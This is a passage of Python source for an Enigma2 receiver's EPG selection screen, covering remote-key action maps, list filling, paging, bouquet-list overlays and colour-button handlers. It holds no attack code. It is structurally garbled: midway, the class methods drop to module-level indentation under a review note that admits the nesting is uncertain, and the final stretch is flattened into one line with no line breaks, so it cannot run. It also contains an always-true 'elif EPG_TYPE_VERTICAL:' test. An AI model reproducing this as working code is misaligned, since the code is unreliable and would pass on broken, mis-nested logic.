					'up': (self.moveBouquetUp, _('Goto previous channel')),
					'down': (self.moveBouquetDown, _('Goto next channel'))
				}, -1)
			self['bouquetcursoractions'].csel = self
			self["bouquetcursoractions"].setEnabled(False)
			self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.leftPressed, _('Goto previous event')),
					'right': (self.rightPressed, _('Goto next event')),
					'up': (self.moveUp, _('Goto previous channel')),
					'down': (self.moveDown, _('Goto next channel'))
				}, -1)
			self['epgcursoractions'].csel = self
			self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
				{
					'nextService': (self.nextPage, _('jump to next page or all up (setup in menu)')),
					'prevService': (self.prevPage, _('jump to previous page or all down (setup in menu)')),
					'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
					'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
					'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
					'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
					'info': (self.Info, _('Show detailed event info (setup in menu)')),
					'infolong': (self.InfoLong, _('Show single epg for current channel (setup in menu)')),
					'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')),
					'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')),
					'menu': (self.createSetup, _('Setup menu'))
				}, -1)
			self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions',
				{
					'1': (self.keyNumberGlobal, _('goto first channel')),
					'2': (self.keyNumberGlobal, _('all events up')),
					'3': (self.keyNumberGlobal, _('goto last channel')),
					'4': (self.keyNumberGlobal, _('previous channel page')),
					'0': (self.keyNumberGlobal, _('goto current channel and now')),
					'6': (self.keyNumberGlobal, _('next channel page')),
					'7': (self.keyNumberGlobal, _('goto now')),
					'8': (self.keyNumberGlobal, _('all events down')),
					'9': (self.keyNumberGlobal, _('Goto Primetime')),
					'5': (self.keyNumberGlobal, _('Set Basetime'))
				}, -1)
		# Visible time span of the graph views; None for list-style views.
		if self.type == EPG_TYPE_GRAPH:
			time_epoch=int(config.epgselection.graph_prevtimeperiod.value)
		elif self.type == EPG_TYPE_INFOBARGRAPH:
			time_epoch=int(config.epgselection.infobar_prevtimeperiod.value)
		else:
			time_epoch=None
		# Vertical mode created its own list1..list5 above; all other modes
		# use a single shared EPGList widget.
		if self.type != EPG_TYPE_VERTICAL:
			self['list'] = EPGList(type=self.type, selChangedCB=self.onSelectionChanged, timer=session.nav.RecordTimer, time_epoch=time_epoch, overjump_empty=config.epgselection.overjump.value, graphic=graphic)
		self.onLayoutFinish.append(self.LayoutFinish)
		self.refreshTimer = eTimer()
		self.refreshTimer.timeout.get().append(self.refreshlist)

	def createSetup(self):
		"""Open the Setup screen matching the current EPG type."""
		self.closeEventViewDialog()
		key = None
		if self.type == EPG_TYPE_SINGLE:
			key = 'epgsingle'
		elif self.type == EPG_TYPE_MULTI:
			key = 'epgmulti'
		elif self.type == EPG_TYPE_ENHANCED:
			key = 'epgenhanced'
		elif self.type == EPG_TYPE_INFOBAR:
			key = 'epginfobar'
		elif self.type == EPG_TYPE_GRAPH:
			key = 'epggraphical'
		elif self.type == EPG_TYPE_INFOBARGRAPH:
			key = 'epginfobargraphical'
		elif self.type == EPG_TYPE_VERTICAL:
			key = 'epgvertical'
		if key:
			self.session.openWithCallback(self.onSetupClose, Setup, key)

	def onSetupClose(self, test = None):
		"""Close this screen with a 'reopen…' result so the caller can
		re-create it with the (possibly changed) settings applied."""
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			if self.type == EPG_TYPE_GRAPH:
				self.close('reopengraph')
			elif self.type == EPG_TYPE_INFOBARGRAPH:
				self.close('reopeninfobargraph')
		elif self.type == EPG_TYPE_INFOBAR:
			self.close('reopeninfobar')
		elif self.type == EPG_TYPE_VERTICAL:
			self.close('reopenvertical')

	def togglePIG(self):
		"""Toggle the Picture-In-Graphics setting and reopen the screen."""
		if self.type == EPG_TYPE_VERTICAL:
			if not config.epgselection.vertical_pig.value:
				config.epgselection.vertical_pig.setValue(True)
			else:
				config.epgselection.vertical_pig.setValue(False)
			config.epgselection.vertical_pig.save()
			configfile.save()
			self.close('reopenvertical')
			return
		if not config.epgselection.graph_pig.value:
			config.epgselection.graph_pig.setValue(True)
		else:
			config.epgselection.graph_pig.setValue(False)
		config.epgselection.graph_pig.save()
		configfile.save()
		self.close('reopengraph')

	def getBouquetServices(self, bouquet):
		"""Return the playable services of *bouquet* as ServiceReference list."""
		services = []
		servicelist = eServiceCenter.getInstance().list(bouquet)
		if not servicelist is None:
			while True:
				service = servicelist.getNext()
				if not service.valid(): #check if end of list
					break
				if service.flags & (eServiceReference.isDirectory | eServiceReference.isMarker): #ignore non playable services
					continue
				services.append(ServiceReference(service))
		return services

	def LayoutFinish(self):
		"""Called once the skin layout is done: show the wait label and
		start populating the lists."""
		self.createTimer = eTimer()
		self.createTimer.start(500, True)
		self['lab1'].show()
		self.onCreate()

	def onCreate(self):
		"""Fill the EPG list(s) for the current EPG type and position the
		selection on the currently playing service/event."""
		title = None
		self.BouquetRoot = False
		serviceref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
		if self.type != EPG_TYPE_VERTICAL:
			self['list'].recalcEntrySize()
		if self.type == EPG_TYPE_VERTICAL:
			self.ask_time = -1
			self.lastEventTime = (time(), time()+3600)
			self.BouquetRoot = False
			# '1:7:0' prefix marks the bouquet root ("all bouquets").
			if self.StartBouquet.toString().startswith('1:7:0'):
				self.BouquetRoot = True
			self.services = self.getBouquetServices(self.StartBouquet)
			self['bouquetlist'].recalcEntrySize()
			self['bouquetlist'].fillBouquetList(self.bouquets)
			self['bouquetlist'].moveToService(self.StartBouquet)
			self['bouquetlist'].setCurrentBouquet(self.StartBouquet)
			self.setTitle(self['bouquetlist'].getCurrentBouquet())
			self["list"].setList(self.getChannels())
			# Resolve the name of the currently playing service; \xc2\x86 /
			# \xc2\x87 are DVB name-highlight control codes and are stripped.
			if self.servicelist:
				service = ServiceReference(self.servicelist.getCurrentSelection())
				info = service and service.info()
				nameROH = info and info.getName(service.ref).replace('\xc2\x86', '').replace('\xc2\x87', '')
			else:
				service = self.session.nav.getCurrentService()
				info = service and service.info()
				nameROH = info and info.getName().replace('\xc2\x86', '').replace('\xc2\x87', '')
			if (nameROH is not None) and not ('channel1' in config.epgselection.vertical_startmode.value):
				# Locate the playing channel and page/column to show it.
				idx = 0
				for channel in self.myServices:
					idx += 1
					if channel[1] == nameROH:
						break
				page = idx/(self.Fields-1)
				row = idx%(self.Fields-1)
				if row:
					self.activeList = row
				else:
					page -= 1
					self.activeList = self.Fields-1
				self["list"].moveToIndex(0)
				for i in range(0, page):
					self["list"].pageDown()
			else:
				self["list"].moveToIndex(0)
			self['Service'].newService(service.ref)
			if self.firststart and 'primetime' in config.epgselection.vertical_startmode.value:
				self.gotoPrimetime()
			else:
				self.updateVerticalEPG()
			self.firststart = False
		elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_MULTI:
			if self.StartBouquet.toString().startswith('1:7:0'):
				self.BouquetRoot = True
			self.services = self.getBouquetServices(self.StartBouquet)
			self['bouquetlist'].recalcEntrySize()
			self['bouquetlist'].fillBouquetList(self.bouquets)
			self['bouquetlist'].moveToService(self.StartBouquet)
			self['bouquetlist'].setCurrentBouquet(self.StartBouquet )
			self.setTitle(self['bouquetlist'].getCurrentBouquet())
			if self.type == EPG_TYPE_MULTI:
				self['list'].fillMultiEPG(self.services, self.ask_time)
			else:
				self['list'].fillGraphEPG(self.services, self.ask_time)
			self['list'].setCurrentlyPlaying(serviceref)
			self['list'].moveToService(serviceref)
			if self.type != EPG_TYPE_MULTI:
				# Second fill pass refreshes the graph around the selection.
				self['list'].fillGraphEPG(None, self.ask_time, True)
			if self.type == EPG_TYPE_GRAPH:
				self['list'].setShowServiceMode(config.epgselection.graph_servicetitle_mode.value)
				self.moveTimeLines()
				if 'channel1' in config.epgselection.graph_startmode.value:
					self['list'].instance.moveSelectionTo(0)
			elif self.type == EPG_TYPE_INFOBARGRAPH:
				self['list'].setShowServiceMode(config.epgselection.infobar_servicetitle_mode.value)
				self.moveTimeLines()
		elif self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
			if self.type == EPG_TYPE_SINGLE:
				service = self.currentService
			elif self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
				service = ServiceReference(self.servicelist.getCurrentSelection())
				title = ServiceReference(self.servicelist.getRoot()).getServiceName()
			self['Service'].newService(service.ref)
			if title:
				title = title + ' - ' + service.getServiceName()
			else:
				title = service.getServiceName()
			self.setTitle(title)
			self['list'].fillSingleEPG(service)
			self['list'].sortSingleEPG(int(config.epgselection.sort.value))
		else:
			# EPG_TYPE_SIMILAR: list events similar to the given event id.
			self['list'].fillSimilarList(self.currentService, self.eventid)
		self['lab1'].hide()

	def refreshlist(self):
		"""Re-fill the visible list(s) while keeping the current selection."""
		self.refreshTimer.stop()
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			self.ask_time = self['list'].getTimeBase()
			self['list'].fillGraphEPG(None, self.ask_time)
			self.moveTimeLines()
		elif self.type == EPG_TYPE_MULTI:
			curr = self['list'].getCurrentChangeCount()
			self['list'].fillMultiEPG(self.services, self.ask_time)
			# Re-apply the previous now/next/more column position.
			for i in range(curr):
				self['list'].updateMultiEPG(1)
		elif self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
			try:
				if self.type == EPG_TYPE_SINGLE:
					service = self.currentService
				elif self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
					service = ServiceReference(self.servicelist.getCurrentSelection())
				if not self.cureventindex:
					index = self['list'].getCurrentIndex()
				else:
					index = self.cureventindex
					self.cureventindex = None
				self['list'].fillSingleEPG(service)
				self['list'].sortSingleEPG(int(config.epgselection.sort.value))
				self['list'].setCurrentIndex(index)
			except:
				# Best effort refresh: keep the screen alive on any failure.
				pass
		elif self.type == EPG_TYPE_VERTICAL:
			curr = self['list'+str(self.activeList)].getSelectedEventId()
			currPrg = self.myServices[self.getActivePrg()]
			l = self['list'+str(self.activeList)]
			l.recalcEntrySize()
			service = ServiceReference(currPrg[0])
			stime = None
			if self.ask_time > time():
				stime = self.ask_time
			l.fillSingleEPG(service, stime)
			self['list'+str(self.activeList)].moveToEventId(curr)

	def moveUp(self):
		"""Move the selection one entry up (with 24h wrap in vertical EPG)."""
		if self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_updownbtn.value:
			if self.getEventTime(self.activeList)[0] is None:
				return
			self.saveLastEventTime()
			idx = self['list'+str(self.activeList)].getCurrentIndex()
			if not idx:
				# At the first entry: step back one day, keep event time.
				tmp = self.lastEventTime
				self.setMinus24h(True, 6)
				self.lastEventTime = tmp
				self.gotoLasttime()
			elif config.epgselection.vertical_updownbtn.value:
				if not idx % config.epgselection.vertical_itemsperpage.value:
					self.syncUp(idx)
		# activeList is '' for non-vertical types, i.e. self['list'].
		self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveUp)
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			self.moveTimeLines(True)
		if self.type == EPG_TYPE_VERTICAL:
			self.saveLastEventTime()

	def moveDown(self):
		"""Move the selection one entry down."""
		if self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_updownbtn.value:
			idx = self['list'+str(self.activeList)].getCurrentIndex()
			if not (idx+1) % config.epgselection.vertical_itemsperpage.value:
				self.syncDown(idx+1)
		self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveDown)
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			self.moveTimeLines(True)
		if self.type == EPG_TYPE_VERTICAL:
			self.saveLastEventTime()

	def updEvent(self, dir, visible = True):
		"""Move the graph selection by *dir* events and refresh timelines."""
		ret = self['list'].selEntry(dir, visible)
		if ret:
			self.moveTimeLines(True)
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			self.moveTimeLines(True)

	def nextPage(self, numberkey=False, reverse = False):
		"""Page forward; in vertical EPG the CH+ button behaviour is
		configurable (scroll all / 24h jump / channel page)."""
		if self.type == EPG_TYPE_VERTICAL:
			if not numberkey and 'scroll' in config.epgselection.vertical_channelbtn.value:
				if config.epgselection.vertical_channelbtn_invert.value:
					self.allDown()
				else:
					self.allUp()
			elif not numberkey and '24' in config.epgselection.vertical_channelbtn.value:
				if config.epgselection.vertical_channelbtn_invert.value:
					self.setPlus24h()
				else:
					self.setMinus24h()
			else:
				if not numberkey:
					# Inverted buttons: delegate to prevPage exactly once.
					if not reverse and config.epgselection.vertical_channelbtn_invert.value:
						self.prevPage(reverse = True)
						return
				if len(self.list) <= self["list"].getSelectionIndex() + self.Fields-1:
					# Past the last channel page: wrap to the beginning.
					self.gotoFirst()
				else:
					self["list"].pageDown()
					self.activeList = 1
					self.updateVerticalEPG()
					self.gotoLasttime()
		else:
			self['list'].moveTo(self['list'].instance.pageDown)

	def prevPage(self, numberkey=False, reverse = False):
		"""Page backward; mirror image of nextPage()."""
		if self.type == EPG_TYPE_VERTICAL:
			if not numberkey and 'scroll' in config.epgselection.vertical_channelbtn.value:
				if config.epgselection.vertical_channelbtn_invert.value:
					self.allUp()
				else:
					self.allDown()
			elif not numberkey and '24' in config.epgselection.vertical_channelbtn.value:
				if config.epgselection.vertical_channelbtn_invert.value:
					self.setMinus24h()
				else:
					self.setPlus24h()
			else:
				if not numberkey:
					if not reverse and config.epgselection.vertical_channelbtn_invert.value:
						self.nextPage(reverse = True)
						return
				if not self["list"].getSelectionIndex():
					# Already at the first page: wrap to the end.
					self.gotoLast()
				else:
					self['list'].pageUp()
					self.activeList = (self.Fields-1)
					self.updateVerticalEPG()
					self.gotoLasttime()
		else:
			self['list'].moveTo(self['list'].instance.pageUp)

	def toTop(self):
		"""Jump to the first entry of the list."""
		self['list'].moveTo(self['list'].instance.moveTop)

	def toEnd(self):
		"""Jump to the last entry of the list."""
		self['list'].moveTo(self['list'].instance.moveEnd)

	def leftPressed(self):
		"""LEFT key: previous event / previous channel column / page."""
		if self.type == EPG_TYPE_VERTICAL:
			first = not self["list"].getSelectionIndex() and self.activeList == 1
			if self.activeList > 1 and not first:
				self.activeList -= 1
				self.displayActiveEPG()
			else:
				if first:
					self.gotoLast()
				else:
					self["list"].pageUp()
					self.activeList = (self.Fields-1)
					self.updateVerticalEPG()
					self.gotoLasttime()
			self.onSelectionChanged()
		elif self.type == EPG_TYPE_MULTI:
			self['list'].updateMultiEPG(-1)
		else:
			self.updEvent(-1)

	def rightPressed(self):
		"""RIGHT key: next event / next channel column / page."""
		if self.type == EPG_TYPE_VERTICAL:
			end = len(self.list) == self["list"].getSelectionIndex() + self.activeList
			if self.activeList < (self.Fields-1) and not end:
				self.activeList += 1
				self.displayActiveEPG()
			else:
				if end:
					self.gotoFirst()
				else:
					self["list"].pageDown()
					self.activeList = 1
					self.updateVerticalEPG()
					self.gotoLasttime()
			self.onSelectionChanged()
		elif self.type == EPG_TYPE_MULTI:
			self['list'].updateMultiEPG(1)
		else:
			self.updEvent(+1)

	def Bouquetlist(self):
		"""Toggle between the bouquet list and the EPG list."""
		if not self.bouquetlist_active:
			self.BouquetlistShow()
		else:
			self.BouquetlistHide()

	def BouquetlistShow(self):
		"""Show the bouquet list and swap the active action maps."""
# NOTE(review): this span was re-indented from a flattened source line; the
# branch nesting at the points marked below should be verified upstream.

# --- continuation of BouquetlistShow(self), whose "def" line is on the
#     previous source line: reroute OK/cursor keys to the bouquet-list
#     overlay and show it ---
self.curindex = self['bouquetlist'].l.getCurrentSelectionIndex()  # remembered so BouquetlistHide(cancel=True) can restore it
self["epgcursoractions"].setEnabled(False)
self["okactions"].setEnabled(False)
self['bouquetlist'].show()
self["bouquetokactions"].setEnabled(True)
self["bouquetcursoractions"].setEnabled(True)
self.bouquetlist_active = True

def BouquetlistHide(self, cancel=True):
    """Hide the bouquet-list overlay and restore the normal EPG key maps.

    cancel -- when True, discard the selection made while the overlay was
    open and restore the previously remembered index (self.curindex).
    """
    self["bouquetokactions"].setEnabled(False)
    self["bouquetcursoractions"].setEnabled(False)
    self['bouquetlist'].hide()
    if cancel:
        self['bouquetlist'].setCurrentIndex(self.curindex)
    # Re-enabling the normal actions happens unconditionally: BouquetOK()
    # calls BouquetlistHide(False) and the screen must keep responding.
    self["okactions"].setEnabled(True)
    self["epgcursoractions"].setEnabled(True)
    self.bouquetlist_active = False

def getCurrentBouquet(self):
    """Return the service reference of the bouquet to operate on.

    Prefers the bouquet root captured at screen start, then the current
    highlight of the bouquet-list overlay, falling back to the service
    list root.
    """
    if self.BouquetRoot:
        return self.StartBouquet
    elif 'bouquetlist' in self:
        cur = self["bouquetlist"].l.getCurrentSelection()
        return cur and cur[1]  # None/False when the overlay list is empty
    else:
        return self.servicelist.getRoot()

def BouquetOK(self):
    """Apply the bouquet highlighted in the overlay: reload the service
    set and refill the EPG view for the current screen type."""
    self.BouquetRoot = False
    self.services = self.getBouquetServices(self.getCurrentBouquet())
    if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        if self.type == EPG_TYPE_GRAPH:
            # Start the grid a configurable number of minutes in the past,
            # rounded down to the configured grid raster.
            now = time() - int(config.epgselection.graph_histminutes.value) * 60
            self.ask_time = now - now % (int(config.epgselection.graph_roundto.value) * 60)
            if 'primetime' in config.epgselection.graph_startmode.value:
                # Jump to today's configured prime-time slot ...
                basetime = localtime(self.ask_time)
                basetime = (basetime[0], basetime[1], basetime[2], int(config.epgselection.graph_primetimehour.value), int(config.epgselection.graph_primetimemins.value), 0, basetime[6], basetime[7], basetime[8])
                self.ask_time = mktime(basetime)
                if self.ask_time + 3600 < time():
                    # ... or tomorrow's, when today's slot is already more
                    # than an hour in the past.
                    self.ask_time += 86400
        elif self.type == EPG_TYPE_INFOBARGRAPH:
            now = time() - int(config.epgselection.infobar_histminutes.value) * 60
            self.ask_time = now - now % (int(config.epgselection.infobar_roundto.value) * 60)
        # NOTE(review): the three lines below are taken to apply to both
        # graph variants (dedented from the inner if/elif) — verify.
        self['list'].resetOffset()
        self['list'].fillGraphEPG(self.services, self.ask_time)
        self.moveTimeLines(True)
    elif self.type == EPG_TYPE_MULTI:
        self['list'].fillMultiEPG(self.services, self.ask_time)
    if self.type == EPG_TYPE_VERTICAL:
        self["list"].setList(self.getChannels())
        self.gotoFirst()
    else:
        self['list'].instance.moveSelectionTo(0)
        if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
            self['list'].fillGraphEPG(None, self.ask_time, True)
    self.setTitle(self['bouquetlist'].getCurrentBouquet())
    self.BouquetlistHide(False)

def moveBouquetUp(self):
    # Move the overlay cursor up and redraw the bouquet entries.
    self['bouquetlist'].moveTo(self['bouquetlist'].instance.moveUp)
    self['bouquetlist'].fillBouquetList(self.bouquets)

def moveBouquetDown(self):
    self['bouquetlist'].moveTo(self['bouquetlist'].instance.moveDown)
    self['bouquetlist'].fillBouquetList(self.bouquets)

def moveBouquetPageUp(self):
    self['bouquetlist'].moveTo(self['bouquetlist'].instance.pageUp)
    self['bouquetlist'].fillBouquetList(self.bouquets)

def moveBouquetPageDown(self):
    self['bouquetlist'].moveTo(self['bouquetlist'].instance.pageDown)
    self['bouquetlist'].fillBouquetList(self.bouquets)

def nextBouquet(self):
    """Switch to the next bouquet (CH+ style) for the view types that
    carry their own bouquet overlay; otherwise delegate to the service
    list when multi-bouquet mode is on."""
    if self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL:
        self.moveBouquetDown()
        self.BouquetOK()
    elif (self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR) and config.usage.multibouquet.value:
        # Remember where we were so the caller can restore on close.
        self.CurrBouquet = self.servicelist.getCurrentSelection()
        self.CurrService = self.servicelist.getRoot()
        self.servicelist.nextBouquet()
        self.onCreate()

def prevBouquet(self):
    """Mirror of nextBouquet for the CH- direction."""
    if self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL:
        self.moveBouquetUp()
        self.BouquetOK()
    elif (self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR) and config.usage.multibouquet.value:
        self.CurrBouquet = self.servicelist.getCurrentSelection()
        self.CurrService = self.servicelist.getRoot()
        self.servicelist.prevBouquet()
        self.onCreate()

def nextService(self):
    """Step the single-channel views to the next service, skipping
    markers; graph views shift the window instead."""
    if self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
        self.CurrBouquet = self.servicelist.getCurrentSelection()
        self.CurrService = self.servicelist.getRoot()
        self['list'].instance.moveSelectionTo(0)
        if self.servicelist.inBouquet():
            prev = self.servicelist.getCurrentSelection()
            if prev:
                prev = prev.toString()
                while True:
                    if config.usage.quickzap_bouquet_change.value and self.servicelist.atEnd():
                        self.servicelist.nextBouquet()
                    else:
                        self.servicelist.moveDown()
                    cur = self.servicelist.getCurrentSelection()
                    # flag 64: presumably eServiceReference.isMarker — skip
                    # markers; stop when back at the start. TODO confirm.
                    if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
                        break
        else:
            self.servicelist.moveDown()
        if self.isPlayable():
            self.onCreate()
            if not self['list'].getCurrent()[1] and config.epgselection.overjump.value:
                # No EPG data for this service: keep stepping when the
                # overjump option is enabled.
                self.nextService()
        else:
            self.nextService()
    elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        self.updEvent(+24)
    elif self.serviceChangeCB:
        self.serviceChangeCB(1, self)

def prevService(self):
    """Mirror of nextService for the previous direction."""
    if self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
        self.CurrBouquet = self.servicelist.getCurrentSelection()
        self.CurrService = self.servicelist.getRoot()
        self['list'].instance.moveSelectionTo(0)
        if self.servicelist.inBouquet():
            prev = self.servicelist.getCurrentSelection()
            if prev:
                prev = prev.toString()
                while True:
                    if config.usage.quickzap_bouquet_change.value:
                        if self.servicelist.atBegin():
                            self.servicelist.prevBouquet()
                    self.servicelist.moveUp()
                    cur = self.servicelist.getCurrentSelection()
                    if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
                        break
        else:
            self.servicelist.moveUp()
        if self.isPlayable():
            self.onCreate()
            if not self['list'].getCurrent()[1] and config.epgselection.overjump.value:
                self.prevService()
        else:
            self.prevService()
    elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        self.updEvent(-24)
    elif self.serviceChangeCB:
        self.serviceChangeCB(-1, self)

def enterDateTime(self):
    """Open the time/date input dialog preloaded with the per-view
    "previous time" setting."""
    global mepg_config_initialized
    if self.type == EPG_TYPE_MULTI:
        if not mepg_config_initialized:
            # Lazily create the shared clock config item on first use.
            config.misc.prev_mepg_time = ConfigClock(default=time())
            mepg_config_initialized = True
        # (method continues on the next source line)
self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.misc.prev_mepg_time) elif self.type == EPG_TYPE_GRAPH: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.graph_prevtime) elif self.type == EPG_TYPE_INFOBARGRAPH: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.infobar_prevtime) elif self.type == EPG_TYPE_VERTICAL: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.vertical_prevtime) def onDateTimeInputClosed(self, ret): if len(ret) > 1: if ret[0]: self.ask_time = ret[1] if self.type == EPG_TYPE_MULTI: self['list'].fillMultiEPG(self.services, self.ask_time) elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: self.ask_time -= self.ask_time % (int(config.epgselection.graph_roundto.value) * 60) elif self.type == EPG_TYPE_INFOBARGRAPH: self.ask_time -= self.ask_time % (int(config.epgselection.infobar_roundto.value) * 60) l = self['list'] l.resetOffset() l.fillGraphEPG(None, self.ask_time) self.moveTimeLines(True) elif EPG_TYPE_VERTICAL: if self.ask_time > time(): self.updateVerticalEPG() else: self.ask_time = -1 if self.eventviewDialog and (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH): self.infoKeyPressed(True) def infoKeyPressed(self, eventviewopen=False): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] service = cur[1] if event is not None and not self.eventviewDialog and not eventviewopen: if self.type != EPG_TYPE_SIMILAR: if self.type == EPG_TYPE_INFOBARGRAPH: self.eventviewDialog = self.session.instantiateDialog(EventViewSimple, event, service, skin='InfoBarEventView') self.eventviewDialog.show() else: self.session.open(EventViewEPGSelect, event, service, callback=self.eventViewCallback, similarEPGCB=self.openSimilarList) elif self.eventviewDialog and not eventviewopen: self.eventviewDialog.hide() del 
self.eventviewDialog self.eventviewDialog = None elif event is not None and self.eventviewDialog and eventviewopen: if self.type != EPG_TYPE_SIMILAR: if self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH: self.eventviewDialog.hide() self.eventviewDialog = self.session.instantiateDialog(EventViewSimple, event, service, skin='InfoBarEventView') self.eventviewDialog.show() def redButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_red.value == "24plus": self.nextService() if config.epgselection.graph_red.value == "24minus": self.prevService() if config.epgselection.graph_red.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_red.value == "imdb" or config.epgselection.graph_red.value == None: self.openIMDb() if config.epgselection.graph_red.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_red.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_red.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_red.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_red.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_red.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_red.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_red.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_red.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_red.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_red.value == "24plus": self.setPlus24h() if 
config.epgselection.vertical_red.value == "24minus": self.setMinus24h() if config.epgselection.vertical_red.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_red.value == "imdb" or config.epgselection.vertical_red.value == None: self.openIMDb() if config.epgselection.vertical_red.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_red.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_red.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_red.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_red.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_red.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_red.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_red.value == "gotodatetime": self.enterDateTime() else: self.openIMDb() def redButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.sortEpg() def greenButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_green.value == "24plus": self.nextService() if config.epgselection.graph_green.value == "24minus": self.prevService() if config.epgselection.graph_green.value == "timer" or config.epgselection.graph_green.value == None: self.RecordTimerQuestion(True) if config.epgselection.graph_green.value == "imdb": self.openIMDb() if config.epgselection.graph_green.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_green.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_green.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_green.value == 
"showmovies": self.showMovieSelection() if config.epgselection.graph_green.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_green.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_green.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_green.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_green.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_green.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_green.value == "24plus": self.setPlus24h() if config.epgselection.vertical_green.value == "24minus": self.setMinus24h() if config.epgselection.vertical_green.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_green.value == "imdb" or config.epgselection.vertical_green.value == None: self.openIMDb() if config.epgselection.vertical_green.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_green.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_green.value == "epgsearch": 